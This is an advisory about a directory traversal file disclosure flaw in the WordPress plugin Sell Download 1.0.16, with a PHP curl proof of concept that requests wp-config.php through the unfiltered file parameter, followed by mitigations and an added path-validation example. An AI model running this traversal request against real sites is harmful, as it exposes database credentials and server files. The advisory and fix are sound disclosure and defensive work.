WordPress Sell Download 1.0.16 Local File Disclosure Vulnerability


The WordPress plugin Sell Download v1.0.16 suffers from a Local File Disclosure vulnerability: the `file` parameter of sell-downloads.php is not filtered for directory traversal, so a remote, unauthenticated attacker can read arbitrary local files the web server can access.


// page : sell-downloads.php
// lines : 119, 130.. 131

<?php
// Proof of concept: request wp-config.php through the unfiltered ?file= parameter.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
// Return the body as a string instead of printing it directly, so $buf holds the response.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$buf = curl_exec($ch);
curl_close($ch);

echo $buf;



    1. Modify the source code to strictly filter the parameter for sequences such as "../" and "..\" and any other special characters that may enable a Local File Inclusion attack;

    2. If you have purchased an NGAF appliance, update the WAF signature database to version 20151218 or above.
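Added example illustrating the first mitigation item; this is not the plugin's code. It confines a user-supplied file name to one download directory by canonicalising the path with realpath() and checking the prefix, which also catches symlinks, rather than only blacklisting "../". The directory name and the helper's name are assumptions.

```php
<?php
// Added example, not from the Sell Download plugin. Assumed: downloads live in
// a fixed directory and are identified by a bare file name in ?file=.

/**
 * Return the canonical path of $requested inside $baseDir, or null when the
 * request would escape $baseDir (via "../", "..\", NUL bytes or symlinks).
 */
function safe_download_path(string $baseDir, string $requested): ?string
{
    // Canonicalise the base directory first; bail out if it does not exist.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // NUL bytes truncate paths in the underlying C file APIs; reject them.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Accept only a bare file name: no directory separators of any kind.
    if ($requested === '' || $requested !== basename($requested)) {
        return null;
    }
    // realpath() resolves symlinks and fails for non-existent files, so the
    // prefix check below also rejects a symlink that points outside $base.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage sketch for a ?file= handler (directory name is an assumption).
$downloadsDir = __DIR__ . '/downloads';
$path = safe_download_path($downloadsDir, (string) ($_GET['file'] ?? ''));
if ($path === null) {
    // Respond identically for traversal attempts and missing files.
    http_response_code(404);
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

With this check, the traversal string from the proof of concept above resolves outside the download directory and is refused with a 404 before any file is opened.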